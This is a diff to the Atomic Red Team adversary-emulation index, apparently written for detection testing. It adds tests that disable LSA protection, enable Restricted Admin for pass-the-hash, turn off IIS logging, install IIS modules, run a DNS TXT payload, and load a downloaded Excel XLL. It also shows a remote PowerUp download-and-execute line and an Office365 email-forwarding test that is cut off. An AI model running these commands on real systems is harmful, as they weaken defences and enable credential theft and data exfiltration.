 |  | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hide Artifacts](../../T1564/T1564.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Video Capture](../../T1125/T1125.md) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Process Discovery](../../T1057/T1057.md) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
@@ -36,7 +36,7 @@
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Indirect Command Execution](../../T1202/T1202.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Network Service Scanning](../../T1046/T1046.md) |  |  |  | [Non-Application Layer Protocol](../../T1095/T1095.md) |  |
 |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Time Providers](../../T1547.003/T1547.003.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  | Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Process Injection](../../T1055/T1055.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -82,7 +82,7 @@
 |  |  | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) |  |  |  |  |  |  |  |
 |  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
-|  |  | IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) |  |  |  |  |  |  |  |
+|  |  | [IIS Components](../../T1505.004/T1505.004.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution](../../T1546/T1546.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Authentication Package](../../T1547.002/T1547.002.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/index.yaml

@@ -6863,7 +6863,32 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - User
-    atomic_tests: []
+      identifier: T1562
+    atomic_tests:
+    - name: Windows Disable LSA Protection
+      auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d
+      description: "The following Atomic adds a registry entry to disable LSA Protection.\n\nThe
+        LSA controls and manages user rights information, password hashes and other
+        important bits of information in memory. Attacker tools, such as mimikatz,
+        rely on accessing this content to scrape password hashes or clear-text passwords.
+        Enabling LSA Protection configures Windows to control the information stored
+        in memory in a more secure fashion - specifically, to prevent non-protected
+        processes from accessing that data.\nUpon successful execution, the registry
+        will be modified and RunAsPPL will be set to 0, disabling Lsass protection.\nhttps://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection\nhttps://blog.netwrix.com/2022/01/11/understanding-lsa-protection/\nhttps://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
+        \ \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t
+          REG_DWORD /d 0 /f
+
+          '
+        cleanup_command: 'reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v
+          RunAsPPL /f >nul 2>&1
+
+          '
+        name: command_prompt
+        elevation_required: true
   T1055.003:
     technique:
       x_mitre_platforms:
@@ -8612,6 +8637,30 @@ defense-evasion:
         command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
           /section:httplogging /dontLog:true
 
+          '
+        cleanup_command: |
+          if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
+            C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
+          }
+        name: powershell
+    - name: Disable Windows IIS HTTP Logging via PowerShell
+      auto_generated_guid: a957fb0f-1e85-49b2-a211-413366784b1e
+      description: |
+        Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
+        This action requires HTTP logging configurations in IIS to be unlocked.
+
+        Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
+      supported_platforms:
+      - windows
+      input_arguments:
+        website_name:
+          description: The name of the website on a server
+          type: String
+          default: Default Web Site
+      executor:
+        command: 'set-WebConfigurationProperty -PSPath "IIS:\Sites\#{website_name}\"
+          -filter "system.webServer/httpLogging" -name dontLog -value $true
+
           '
         cleanup_command: |
           if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
@@ -10967,21 +11016,41 @@ defense-evasion:
           reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
         name: command_prompt
         elevation_required: true
-    - name: DisallowRun Execution Of Certain Application
+    - name: DisallowRun Execution Of Certain Applications
       auto_generated_guid: 71db768a-5a9c-4047-b5e7-59e01f188e84
       description: "Modify the registry of the currently logged in user using reg.exe
         via cmd console to prevent user running specific computer programs that could
-        aid them in manually removing malware or detecting it \nusing security product.\nSee
-        how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/\n"
+        aid them in manually removing malware or detecting it \nusing security product.\n"
       supported_platforms:
       - windows
       executor:
         command: |
           reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
-          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art1 /d "regedit.exe"
+          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art2 /d "cmd.exe"
         cleanup_command: |
           reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
-          reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v 1 /f >nul 2>&1
+          reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v art1 /f >nul 2>&1
+          reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v art2 /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: Enabling Restricted Admin Mode via Command_Prompt
+      auto_generated_guid: fe7974e5-5813-477b-a7bd-311d4f535e83
+      description: 'Enabling Restricted Admin Mode via Command_Prompt,enables an attacker
+        to perform a pass-the-hash attack using RDP
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin
+          /t REG_DWORD /d 0
+
+          '
+        cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\lsa" /f
+          /v DisableRestrictedAdmin >nul 2>&1
+
+          '
         name: command_prompt
         elevation_required: true
   T1574.008:
@@ -33053,19 +33122,39 @@ privilege-escalation:
       - Administrator
       identifier: T1546.005
     atomic_tests:
-    - name: Trap
+    - name: Trap EXIT
       auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61
       description: |
-        After exiting the shell, the script will download and execute.
-        After sending a keyboard interrupt (CTRL+C) the script will download and execute.
+        Launch bash shell with command arg to create TRAP on EXIT.
+        The trap executes script that writes to /tmp/art-fish.txt
       supported_platforms:
       - macos
       - linux
       executor:
-        command: |
-          trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" EXIT
-          exit
-          trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" SIGINt
+        command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
+          EXIT''
+
+          '
+        cleanup_command: 'rm -f /tmp/art-fish.txt
+
+          '
+        name: sh
+    - name: Trap SIGINT
+      auto_generated_guid: a547d1ba-1d7a-4cc5-a9cb-8d65e8809636
+      description: |
+        Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
+        The trap executes script that writes to /tmp/art-fish.txt
+      supported_platforms:
+      - macos
+      - linux
+      executor:
+        command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
+          SIGINT && kill -SIGINT $$''
+
+          '
+        cleanup_command: 'rm -f /tmp/art-fish.txt
+
+          '
         name: sh
   T1574.006:
     technique:
@@ -45198,6 +45287,44 @@ execution:
           '
         name: bash
         elevation_required: false
+    - name: Docker Exec Into Container
+      auto_generated_guid: 900e2c49-221b-42ec-ae3c-4717e41e6219
+      description: 'Attackers who have permissions, can run malicious commands in
+        containers in the cluster using exec command (“docker exec”). In this method,
+        attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as
+        a backdoor container, and run their malicious code remotely by using “docker
+        exec”. Kinsing (Golang-based malware) was executed with an Ubuntu container
+        entry point that runs shell scripts.
+
+        '
+      supported_platforms:
+      - containers
+      input_arguments:
+        command:
+          description: Command to run
+          type: String
+          default: cat
+      dependencies:
+      - description: 'docker must be installed
+
+          '
+        get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
+          Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
+          ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
+          echo "Docker installed"; fi
+
+          '
+        prereq_command: 'which docker
+
+          '
+      executor:
+        command: "docker build -t t1609  $PathtoAtomicsFolder/T1609/src/ \ndocker
+          run --name t1609_container --rm -itd t1609 bash /tmp/script.sh\ndocker exec
+          -i t1609_container bash -c \"cat /tmp/output.txt\"\n"
+        cleanup_command: "docker stop t1609_container\ndocker rmi -f t1609:latest
+          \n"
+        name: bash
+        elevation_required: false
   T1191:
     technique:
       x_mitre_platforms:
@@ -46456,6 +46583,20 @@ execution:
           iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
           Invoke-AllChecks
         name: powershell
+    - name: Abuse Nslookup with DNS Records
+      auto_generated_guid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
+      description: |
+        Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.
+        [reference](https://twitter.com/jstrosch/status/1237382986557001729)
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          # creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
+          # this would not be part of a real attack but helpful for this simulation
+          function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
+          powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
+        name: powershell
   T1170:
     technique:
       x_mitre_platforms:
@@ -52108,10 +52249,13 @@ persistence:
       - User
       identifier: T1137.006
     atomic_tests:
-    - name: Code Executed Via Excel Add-in File (Xll)
+    - name: Code Executed Via Excel Add-in File (XLL)
       auto_generated_guid: 441b1a0f-a771-428a-8af0-e99e4698cda3
       description: "Downloads a XLL file and loads it using the excel add-ins library.\nThis
-        causes excel to display the message \"Hello World\"\nSource of XLL - https://github.com/edparcell/HelloWorldXll
+        causes excel to display the message \"Hello World\". This does not include
+        persistent code execution.\n\nThe provided XLL is for 64-bit versions of Excel
+        only. If you are using a 32-bit version this will fail and \"False\" will\nbe
+        printed to the screen.\n\n[Source of XLL](https://github.com/edparcell/HelloWorldXll)
         \n"
       supported_platforms:
       - windows
@@ -52126,9 +52270,8 @@ persistence:
           default: "$env:tmp\\HelloWorldXll.xll"
       executor:
         name: powershell
-        elevation_required: true
-        command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX
-          ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))"
+        command: 'iwr -URI ''#{xll_url}'' -o "#{local_file}"; (new-object -ComObject
+          excel.application).RegisterXLL("$env:tmp\HelloWorldXll.xll")
 
           '
   T1505.002:
@@ -54802,19 +54945,39 @@ persistence:
       - Administrator
       identifier: T1546.005
     atomic_tests:
-    - name: Trap
+    - name: Trap EXIT
       auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61
       description: |
-        After exiting the shell, the script will download and execute.
-        After sending a keyboard interrupt (CTRL+C) the script will download and execute.
+        Launch bash shell with command arg to create TRAP on EXIT.
+        The trap executes script that writes to /tmp/art-fish.txt
       supported_platforms:
       - macos
       - linux
       executor:
-        command: |
-          trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" EXIT
-          exit
-          trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" SIGINt
+        command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
+          EXIT''
+
+          '
+        cleanup_command: 'rm -f /tmp/art-fish.txt
+
+          '
+        name: sh
+    - name: Trap SIGINT
+      auto_generated_guid: a547d1ba-1d7a-4cc5-a9cb-8d65e8809636
+      description: |
+        Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
+        The trap executes script that writes to /tmp/art-fish.txt
+      supported_platforms:
+      - macos
+      - linux
+      executor:
+        command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
+          SIGINT && kill -SIGINT $$''
+
+          '
+        cleanup_command: 'rm -f /tmp/art-fish.txt
+
+          '
         name: sh
   T1574.006:
     technique:
@@ -60989,7 +61152,82 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-    atomic_tests: []
+      identifier: T1505.004
+    atomic_tests:
+    - name: Install IIS Module using AppCmd.exe
+      auto_generated_guid: 53adbdfa-8200-490c-871c-d3b1ab3324b2
+      description: |
+        The following Atomic will utilize AppCmd.exe to install a new IIS Module. IIS must be installed.
+        This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/).
+        A successful execution will install a module into IIS using AppCmd.exe.
+        [Managing and installing Modules Reference](https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-module-using-appcmdexe)
+        [IIS Modules](https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/)
+      supported_platforms:
+      - windows
+      input_arguments:
+        module_name:
+          description: The name of the IIS module
+          type: String
+          default: DefaultDocumentModule_Atomic
+        dll_path:
+          description: The path to the DLL to be loaded
+          type: path
+          default: "%windir%\\system32\\inetsrv\\defdoc.dll"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'IIS must be installed in order to add a module to IIS.
+
+          '
+        prereq_command: "$service = get-service w3svc -ErrorAction SilentlyContinue\nif($service){
+          Write-Host \"IIS installed on $env:computername\" } else { Write-Host \"IIS
+          is not installed on $env:computername\" } \n"
+        get_prereq_command: 'Install IIS to continue.
+
+          '
+      executor:
+        command: "%windir%\\system32\\inetsrv\\appcmd.exe install module /name:#{module_name}
+          /image:#{dll_path}\n"
+        cleanup_command: "%windir%\\system32\\inetsrv\\appcmd.exe uninstall module
+          #{module_name}\n"
+        name: command_prompt
+    - name: Install IIS Module using PowerShell Cmdlet New-WebGlobalModule
+      auto_generated_guid: cc3381fb-4bd0-405c-a8e4-6cacfac3b06c
+      description: |
+        The following Atomic will utilize PowerShell Cmdlet New-WebGlobalModule to install a new IIS Module. IIS must be installed.
+        This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/).
+        A successful execution will install a module into IIS using New-WebGlobalModule.
+        [Managing IIS Modules with PowerShell](https://learn.microsoft.com/en-us/powershell/module/webadministration/set-webglobalmodule?view=windowsserver2022-ps)
+        [IIS Modules](https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/)
+      supported_platforms:
+      - windows
+      input_arguments:
+        module_name:
+          description: The name of the IIS module
+          type: String
+          default: DefaultDocumentModule_Atomic
+        dll_path:
+          description: The path to the DLL to be loaded
+          type: path
+          default: "%windir%\\system32\\inetsrv\\defdoc.dll"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'IIS must be installed in order to add a module to IIS.
+
+          '
+        prereq_command: "$service = get-service w3svc -ErrorAction SilentlyContinue\nif($service){
+          Write-Host \"IIS installed on $env:computername\" } else { Write-Host \"IIS
+          is not installed on $env:computername\" } \n"
+        get_prereq_command: 'Install IIS to continue.
+
+          '
+      executor:
+        command: 'New-WebGlobalModule -Name #{module_name} -Image #{dll_path}
+
+          '
+        cleanup_command: 'Remove-WebGlobalModule -Name #{module_name}
+
+          '
+        name: powershell
   T1154:
     technique:
       x_mitre_platforms:
@@ -67421,7 +67659,7 @@ collection:
         command: |
           mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
           dir c: /b /s .docx | findstr /e .docx
-          for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
+          for /R c:\ %f in (*.docx) do copy /Y %f %temp%\T1119_command_prompt_collection
         cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1
 
           '
@@ -68724,7 +68962,7 @@ collection:
         description: Apple. (n.d.). Reply to, forward, or redirect emails in Mail
           on Mac. Retrieved June 22, 2021.
       modified: '2021-10-15T20:19:33.416Z'
-      name: Email Forwarding Rule
+      name: 'Email Collection: Email Forwarding Rule'
       description: |-
         Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)
 
@@ -68743,7 +68981,56 @@ collection:
       - 'Application Log: Application Log Content'
       x_mitre_permissions_required:
       - User
-    atomic_tests: []
+      identifier: T1114.003
+    atomic_tests:
+    - name: Office365 - Email Forwarding
+      auto_generated_guid: 3234117e-151d-4254-9150-3d0bac41e38c
+      description: 'Creates a new Inbox Rule to forward emails to an external user
+        via the "ForwardTo" property of the New-InboxRule Powershell cmdlet.
+
+        '
+      supported_platforms:
+      - office-365
+      input_arguments:
+        username:
+          description: office-365 username
+          type: String
+          default: 
+        password:
+          description: office-365 password
+          type: String
+          default: 
+        rule_name:
+          description: email rule name
+          type: String
+          default: Atomic Red Team Email Rule
+        forwarding_email:
